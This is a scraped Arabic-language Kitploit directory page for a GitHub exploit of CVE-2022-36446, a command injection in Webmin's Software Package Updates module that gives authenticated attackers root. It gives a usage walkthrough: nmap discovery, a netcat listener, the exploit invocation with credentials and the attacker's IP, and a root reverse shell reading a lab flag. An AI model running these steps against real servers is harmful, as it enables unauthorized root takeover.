Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/darnabin/cve-2022-36446-webmin-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubdarnabin/cve-2022-36446-webmin-rce

CVE-2022-36446-Webmin-RCE

استغلال تنفيذ تعليمات برمجية عن بُعد مصادق عليه لـ Webmin < 1.997 عبر وحدة تحديث حزم البرامج. يحقن أوامر عشوائية كجذر من خلال معلمة غير معقمة، مما يقدم شلًا عكسيًا.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد
مشاركة

CVE-2022-36446 — Webmin < 1.997 RCE (مصادق عليه)

استغلال لثغرة تنفيذ الأوامر عن بُعد في Webmin الإصدارات الأقدم من 1.997، عبر وحدة Software Package Updates.

كيف يعمل؟

وحدة Software Package Updates في Webmin لا تقوم بتعقيم المعامل u بشكل صحيح قبل تمريره إلى النظام. يمكن لمستخدم مصادق عليه مع صلاحية الوصول إلى تلك الوحدة حقن أوامر عشوائية تُنفذ كـ root.


المتطلبات الأساسية

قم بتثبيت التبعيات قبل تشغيل الاستغلال:

root@kitploit:~
pip3 install requests beautifulsoup4 lxml urllib3

المعلمات

المعلمةالوصفمثال
-tعنوان الهدف (بدون منفذ)https://192.168.1.10
-uمستخدم Webminadmin
-pكلمة مرور Webminpassword123
-lعنوان IP الخاص بك (حيث تستقبل الشل)192.168.1.5
-lpالمنفذ الذي تستمع عليه4444

خطوة بخطوة

1 — تحديد عنوان IP للهدف باستخدام Nmap:

root@kitploit:~
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin

2 — افتح المستمع على جهازك:

root@kitploit:~
nc -lvnp 4444

3 — في محطة أخرى، قم بتشغيل الاستغلال:

root@kitploit:~
python3 exploit.py \
  -t https://TARGET_IP \
  -u admin \
  -p PASSWORD \
  -l TU_IP \
  -lp 4444

4 — إذا نجح الاستغلال، سترى:

5 — على المستمع، ستستقبل شل كجذر:

root@kitploit:~
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}

مثال كامل

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444

المراجع

  • CVE: CVE-2022-36446
  • CVSS Score: 9.9 (Critical)
  • الإصدار الضعيف: Webmin < 1.997
  • الاستغلال الأصلي: https://www.exploit-db.com/exploits/50998
  • المؤلف الأصلي: Emir Polat
تنزيل الأداة